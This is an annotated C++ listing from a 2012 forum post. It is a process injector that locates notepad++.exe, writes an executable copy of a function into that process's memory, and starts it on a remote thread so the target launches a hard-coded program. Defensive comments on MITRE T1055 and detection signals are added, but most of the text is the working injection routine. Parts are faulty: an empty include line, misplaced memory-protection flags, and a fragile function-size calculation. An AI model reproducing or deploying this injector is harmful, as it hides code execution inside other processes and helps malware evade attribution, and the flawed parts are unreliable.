// Forum post by Expermicid, posted September 2, 2012 (edited February 16, 2014).
// The page tags the listing as Delphi; the code itself is C++ and uses
// String / UnicodeString, so it appears to target C++Builder.
//******************************************************************************
//* AUTHOR: Fakedo0r .:PD-TEAM:.
//* DATE: 01.09.2012
//* EMAIL: [email protected]
//* BLOG: Sub-Soul.blogspot.com / Sub-Soul.com
//* USAGE: Injector;
//******************************************************************************
//
// Overview: Injector() copies a small function (Injected) and its argument
// block (T_INJECT) into another process and starts it there with
// CreateRemoteThread. Seen from the defender's side, the visible call chain is
//   OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(PAGE_EXECUTE_READWRITE)
//   -> WriteProcessMemory -> CreateRemoteThread
// This is the classic remote-thread process-injection pattern (MITRE ATT&CK
// T1055, Process Injection). Each step is a cross-process operation that
// endpoint telemetry can record and correlate.
//******************************************************************************
//INCLUDES
//******************************************************************************
// NOTE(review): the header name(s) after #include did not survive page extraction.
#include
//******************************************************************************
//FUNCTION / PROCEDURE DECLARATIONS
//******************************************************************************
// Allocates iBufferSize bytes in hProcess, writes lpBuffer there, and returns
// the remote address (defined at the end of the listing).
LPVOID AllocAndCopyMem(HANDLE hProcess, const LPVOID lpBuffer, SIZE_T iBufferSize);
// Function-pointer type used to hold the address of ShellExecuteW.
typedef HINSTANCE(WINAPI *__ShellExecute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, int);
//******************************************************************************
//STRUCTURE DECLARATIONS
//******************************************************************************
// Argument block that is copied into the target process and handed to the
// remote thread as its single parameter.
struct T_INJECT {
    __ShellExecute __ShlExe;    // address of ShellExecuteW, resolved by Injector()
    wchar_t cExe[MAX_PATH];     // path passed as the file argument
    wchar_t cOper[MAX_PATH];    // verb passed as the operation argument
};
//******************************************************************************
//<--- THE FUNCTION THAT GETS INJECTED --->
//******************************************************************************
// Body of the remote thread. It reaches everything through tInj (the function
// pointer and both strings), because it runs from a copy placed in another
// process. It calls ShellExecuteW with the verb in cOper and the path in cExe.
void Injected(T_INJECT *tInj) {
    tInj->__ShlExe(0, tInj->cOper, tInj->cExe, NULL, NULL, 1);
}
//******************************************************************************
//<--- THE FUNCTION THAT PERFORMS THE INJECTION --->
//******************************************************************************
// Finds a process by image name, copies T_INJECT and the code of Injected into
// it, runs that code on a remote thread, waits for it, and frees the remote
// allocations. It takes no parameters and returns nothing. The target name
// ("notepad++.exe") and the launched path (L"D:\\1.exe") are hard-coded.
//
// NOTE(review): apart from the hThread test, no API result is checked. If no
// process matches, dwPID is still 0 when OpenProcess is called.
//
// Detection notes: the target process receives an executable, writable private
// allocation it did not make itself, plus a thread whose start address lies in
// that allocation. Because ShellExecuteW is then called from inside the target,
// the launched program would typically appear as started by the target process
// rather than by this one.
void Injector() {
    DWORD dwPID = 0;
    DWORD dwExitCode = 0;
    UINT uTamFun = 0;
    HANDLE hProcess;
    HANDLE hThread;
    HMODULE hModule;
    PROCESSENTRY32 tProcEntry;
    T_INJECT tInj;

    // hProcess first holds the process-list snapshot handle; it is reused
    // below for the target process handle.
    hProcess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    tProcEntry.dwSize = sizeof(PROCESSENTRY32);

    // walk the snapshot and stop at the first entry with a matching image name
    if (Process32First(hProcess, &tProcEntry)) {
        do {
            if (String(tProcEntry.szExeFile) == "notepad++.exe") {
                dwPID = tProcEntry.th32ProcessID;
                break;
            }
        } while (Process32Next(hProcess, &tProcEntry));
    }

    CloseHandle(hProcess);

    // get a handle to the target process (full access rights requested)
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, dwPID);

    // get the address of the API in this process
    hModule = LoadLibrary(UnicodeString("Shell32.dll").w_str());
    tInj.__ShlExe = (__ShellExecute)(DWORD) GetProcAddress(hModule, "ShellExecuteW");

    // fill in the string fields of the argument block
    lstrcpy(tInj.cExe, L"D:\\1.exe");
    lstrcpy(tInj.cOper, L"open");

    // allocate remote memory and copy the argument block into it
    LPVOID lpStruct = AllocAndCopyMem(hProcess, &tInj, sizeof(T_INJECT));

    // The size of Injected is taken as the distance between the two function
    // addresses. This assumes Injector is laid out directly after Injected,
    // which the language does not guarantee. TODO confirm for the build used.
    uTamFun = (UINT)Injector - (UINT)Injected;

    // allocate remote memory and copy the function's code into it
    LPVOID lpEsp = AllocAndCopyMem(hProcess, &Injected, uTamFun);

    // create the remote thread: start address is the copied code, parameter
    // is the copied argument block
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpEsp, lpStruct, 0, NULL);

    if (hThread != 0) {
        // wait until the remote thread's handle is signaled (thread has finished)
        WaitForSingleObject(hThread, INFINITE);

        // read the thread's exit code (stored, not used afterwards)
        GetExitCodeThread(hThread, &dwExitCode);

        // release the handle of the created thread
        CloseHandle(hThread);

        // free both allocations in the target process
        VirtualFreeEx(hProcess, lpStruct, 0, MEM_RELEASE);
        VirtualFreeEx(hProcess, lpEsp, 0, MEM_RELEASE);
    }

    // release the target process handle
    CloseHandle(hProcess);
}
//******************************************************************************
//<--- ALLOCATES SPACE AND WRITES TO MEMORY --->
//******************************************************************************
// Allocates iBufferSize bytes in the process identified by hProcess, copies
// iBufferSize bytes from lpBuffer (local address) into it, and returns the
// remote address. Neither call's result is checked here; the value returned by
// VirtualAllocEx is passed on unchanged.
//
// The region is requested with PAGE_EXECUTE_READWRITE for both callers, so the
// data block is mapped executable as well as the code. A remote RWX allocation
// followed by a cross-process write is a strong signal for memory scanners and
// endpoint monitoring.
LPVOID AllocAndCopyMem(HANDLE hProcess, LPVOID lpBuffer, SIZE_T iBufferSize) {
    // allocate space in the target's memory
    LPVOID lpRemAlloc = VirtualAllocEx(hProcess, 0, iBufferSize, MEM_COMMIT | PAGE_READWRITE, PAGE_EXECUTE_READWRITE);

    // write the buffer into the target's memory
    WriteProcessMemory(hProcess, lpRemAlloc, lpBuffer, iBufferSize, NULL);

    return lpRemAlloc;
}